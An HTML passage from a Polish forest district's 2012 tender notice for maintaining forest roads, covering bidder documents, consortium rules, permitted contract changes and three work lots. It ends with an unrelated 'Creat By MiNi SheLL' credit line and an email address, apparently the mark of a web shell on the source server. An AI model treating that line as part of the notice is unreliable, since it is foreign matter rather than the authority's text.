<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP.
2. Formularz oferty (wg wzoru - załącznik nr 1 do SIWZ) wraz z kosztorysem ofertowym.
3. Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo powinno być załączone w oryginale lub kopii notarialnie potwierdzonej,
4. Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.
5. Wykonawcy mogą wspólnie ubiegać się o zamówienie publiczne na podstawie art.23 PZP. W przypadku podmiotów występujących wspólnie do oferty dołączają pełnomocnictwo do złożenia oferty lub złożenia oferty i podpisania umowy w sprawie zamówienia publicznego. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postepowanie, do którego się odnosi i precyzować zakres umocowania, oraz wymienić wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ( w tym konsorcja i spółki cywilne) żaden z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 PZP. Warunki udziału w postępowaniu  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia powinni spełniać łącznie.

Zgodnie z postanowieniami art. 26 ust. 2b PZP, Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.

W przypadku, gdy wartości określone w dokumentach przedkładanych na potwierdzenie spełnienia warunku w warunku dot. wiedzy i doświadczenia oraz sytuacji finansowej i ekonomicznej zostaną wyrażone w walutach obcych to do oceny spełnienia warunku zostaną przeliczone na złote (PLN) wedle średniego kursu NBP danej waluty do PLN z dnia publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej 
Wykonawca może przedstawić jedną polisę, a w przypadku jej braku inny dokument potwierdzający, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia albo kilka polis lub innych dokumentów potwierdzających posiadane ubezpieczenie na taką łączną wartość.

W przypadku składania oferty wspólnej przez kilku przedsiębiorców art. 23 PZP, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie III.4.2). W przypadku składania kopii tych dokumentów, kopie te winny być poświadczone za zgodność z oryginałem przez wspólników. Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, do złożenia oferty lub złożenia oferty i podpisania umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, oraz wymienić wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
a) zmiany terminu wykonania przedmiotu umowy, jeżeli konieczność zmiany tego terminu nie wynika z przyczyn zależnych od Wykonawcy, w szczególności z następujących powodów:
- zmiany w przepisach prawa,
- na skutek działania klęski _żywiołowej, powodzi, podtopienia, wiatrołomów,
- przy minimalnej dobowej temperaturze poniżej -20C utrzymującej się powyżej 5 dni,
- przy zalegającej pokrywie śnieżnej powyżej 5 cm,
- ze względu na trwający od 1 kwietnia do 30 czerwca okres lęgowy ptaków, w którym nie mogą być prowadzone roboty budowlane, mających bezpośredni wpływ na możliwość prowadzenia robót budowlanych. W przypadku wystąpienia którejkolwiek z wymienionych wyżej okoliczności, termin wykonania przedmiotu umowy ulega odpowiedniemu wydłużeniu o czas niezbędny do należytej realizacji przedmiotu umowy, nie dłużej jednak niż o czas trwania tych okoliczności. Nie uważa się za okoliczność uprawniającą do zmiany terminu wykonania przedmiotu umowy, warunków atmosferycznych poza wyżej wymienionymi, które przy składaniu ofert powinny być normalnie brane pod uwagę;
b) ograniczenia zakresu rzeczowego przedmiotu zamówienia, w sytuacji gdy wykonanie danych robót będzie zbędne do zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami (roboty zaniechane) wykonania przedmiotu umowy;
c) wykonania robót zamiennych w stosunku do przewidzianych dokumentacja projektowa w sytuacji, gdy ich wykonanie będzie niezbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami prawa wykonania przedmiotu umowy, pod warunkiem, że nie spowoduje zwiększenia wynagrodzenia w stosunku do ceny oferty.
W przypadku, o którym mowa w lit. b i lit. c możliwość zaniechania robót, konieczność wykonania robót zamiennych musi zostać protokolarnie stwierdzona przez inspektora nadzoru inwestorskiego i musi zostać zatwierdzona przez projektanta oraz Zamawiającego. Wykonawca bez zatwierdzonego przez Zamawiającego protokołu nie może wykonać robót zamiennych, jak równie_ zaniechać jakichkolwiek robót.
W tej sytuacji wynagrodzenie zostanie przyjęte na podstawie kosztorysu wykonanego w oparciu o następujące założenia:
- ceny jednostkowe robót będą przyjęte z kosztorysu ofertowego,
- ilość robót w oparciu o obmiar wykonanych robót w jednostkach przyjętych w kosztorysie ofertowym z książki obmiarów.
2.Jeżeli nie jest możliwe rozliczenie robót zamiennych w oparciu o powyższe założenia ich wycena nastąpi na podstawie ilość robót z książki obmiarów w oparciu o ceny czynników produkcji przyjęte z cenników SEKOCENBUD jako średnie za okres ich wbudowania, podstawa do określenia nakładów rzeczowych będą odpowiednie pozycje KNR, a w przypadku ich braku - KNNR.
3. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy.
4.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych zmiana danych adresowych stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.poznan.lasy.gov.pl/kolo/index.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Koło
Gaj Stolarski 2
87-865 Izbica Kujawska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 12:00, miejsce: Nadleśnictwo Koło
Gaj Stolarski 2
87-865 Izbica Kujawska
pok. nr 2- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Pakiet nr 1: Utrzymanie dróg na terenie Nadleśnictwa Koło, w tym:

Leśnictwo Zbylczyce , Uroczysko Smardzew, oddz. 258 i 261, Powiat Łęczycki, gmina Grabów, obr.  ew. Polamy
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę płyt betonowych nawierzchni , które wzmocnią istniejące podłoże i ustabilizują istniejącą nawierzchnię, która będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Konserwację nawierzchni projektuje się poprzez wymianę uszkodzonych i uzupełnienie brakujących żelbetowych płyt drogowych o wymiarach 0,8x2,8x0,14m układanych na podsypce piaskowej:
- podsypka piaskowa gr.5-10cm;
- drogowe płyty żelbetowe (materiał inwestora) o wym.0,8x2,8x0,14m układane w poprzek lub wzdłuż oraz odwodnienie drogi poprzez konserwację jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Bugaj, oddz. 146, Powiat Kolski, gmina Babiak, Obr.ew. Kiejsze
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez odtworzenie podbudowy i nawierzchni , będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się poprzez wykorzystanie materiałów miejscowych , naturalnych - kruszywo łamane z odzysku i kruszywo naturalne ( żwir , pospółka ) odtwarzając nast. konstrukcję nawierzchni :
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
oraz odwodnienie drogi poprzez odtworzenie/konserwację  jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Sobótka, oddz. 77,  Powiat Łęczycki, gmina Grabów, Obr.ew. Radzyń
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez odtworzenie podbudowy i nawierzchni , będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się poprzez wykorzystanie materiałów miejscowych , naturalnych - kruszywo łamane z odzysku i kruszywo naturalne ( żwir , pospółka ) odtwarzając nast. konstrukcję nawierzchni :
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
oraz odwodnienie drogi poprzez odtworzenie/konserwację  jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Dąbie, Ur. Ladorudz, oddz. 339, 340,0 331, 332, Powiat Kolski, gmina Dąbie, Obr.ew. Ladorudz
Wykonanie  konserwacji w ramach bieżącego utrzymania zostaną wzmocnione poprzez uzupełnienie podłoża wałkami sosnowymi (materiał inwestora), nawierzchni kruszywem łamanym i naturalnym ( odtworzenie górnej i dolnej warstwy nawierzchni ) , która wzmocni istniejące podłoże i ustabilizuje istniejącą nawierzchnię dzięki czemu drogi będą mogły służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się wykonać, wykorzystując materiały inwestora ( wałki sosnowe ) oraz miejscowe , naturalne ( żwir , pospółka ) oraz kruszywo łamane (z odzysku ) , w następujący sposób, w zależnosci od lokalizacji:
1. Uzupełnienie wałków sosnowych :
- wałki sosnowe o śr. 10-15cm o długości 3,00m układane w poprzek drogi na gruncie rodzimym;
- 15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
2. Uzupełnienie kruszywem łamanym z odzysku :
- 10-20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10-15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
3. Uzupełnienie nawierzchni żwirowej :
- 15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
Sposób nr 4 (profilowanie nawierzchni) .
Oraz odwodnienie drogi poprzez naprawę przydrożnego rowu i zbiorników odparowujących ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 45.23.32.20-7, 45.11.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2: Utrzymanie dróg na terenie Nadleśnictwa Koło, w tym:

Leśnictwo Rogóźno, ur. Jasieniec , oddział 47,48,49,50, Powiat Kolski, gmina Przedecz Obr.ew. Dziwie
Wykonanie konserwacji w ramach bieżącego utrzymania przez uzupełnienie podłoża wałkami sosnowymi, nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez wykonanie górnej warstwy nawierzchni , która wzmocni istniejące podłoże i ustabilizuje istniejącą nawierzchnię będą mogły służyć przez okrągły rok potrzebom gospodarki leśnej. Konserwację nawierzchni projektuje się wykonać wykorzystując materiały inwestora ( wałki sosnowe ) oraz miejscowe , naturalne ( żwir , pospółka ) i pochodzące z odzysku kruszywo łamane, w następujący sposób, w zależnosci od lokalizacji:
1. Uzupełnienie wałków sosnowych :
- wałki sosnowe o śr. 10-15cm o długości 3,00m układane w poprzek drogi na gruncie rodzimym;
- 20 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
2. Uzupełnienie kruszywem łamanym z odzysku:
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
3. Profilowanie nawierzchni równiarką.
Oraz  naprawa przydrożnego rowu i zbiorników odparowujących , przepustów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 45.23.32.20-7, 45.11.21.00-6, 45.23.33.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3: Utrzymanie profilu  dróg leśnych - minimum dwukrotny przejazd walcem samojezdnym i  równiarką. 

Leśnictwo Rzuchów, obr. Ew. Rzuchów, gm. Dąbie
Leśnictwo Rzuchów. Obr.ew. Ladorudzek, gm. Grzegorzew
Leśnictwo Lipie Góry, Obr.ew. Kiejsze, gm. Babiak
Leśnictwo Sobótka, Obr.ew. Sobótka, gm. Grabów
Leśnictwo Sobótka, Obr.ew. Turzynów, gm. Chodów
Lesnictwo Sobótka, Obr.ew. Dzierzbice, gm. Chodów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 45.23.33.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com